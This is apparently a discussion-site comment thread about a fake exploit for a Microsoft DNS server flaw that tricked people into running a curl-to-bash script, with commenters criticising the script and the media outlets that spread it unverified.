This post requires a lot of context to make sense out of. Unless you are in the security space and familiar with what happened last 36 hours, it probably won't make much sense quickly.<p>1) Microsoft has a critical flaw in DNS server<p>2) A security company publishes the info - no public exploit available at this point<p>3) Someone creates a fake exploit - playing a prank on hackers and other security companies<p>4) Lots of people ran the prank code or helped spread the existence of the fake exploit<p>Not sure if this makes it easier to understand- at least I tried. :)
Took one glance at the shell script piping curl to bash and red flags went up everywhere! Not only piping curl to bash, but doing it via a bit.ly link. Then Twitter and the media started to pick it up and pass it on unverified. I should have been shocked, but I wasn't. I'd love to see the bit.ly stats for the short URLs added to the article.
I'm sure people are stupid, I've seen it myself too many times to count, but how does he know that these weren't executed in a VM? A couple hundred shells isn't so much that I'd rule out that some non-trivial fraction of them were under analysis.
I imagine the reason this doesn't happen too often in serious domains is because the next time the person says/posts anything, will they be believed without checking their claims? Of course, in security, this may even be a good thing?(!) :-)
I think the interesting thing here is that outlets like Vulcan picked it up and wrote about it with authority. Linking to the repo from these "trusted" sources likely gave it a lot more credibility than it would otherwise have received.
I was unable to scroll this article on mobile to read it. It seems like it could be interesting, but it’s too bad about the technical obstacles to doing so.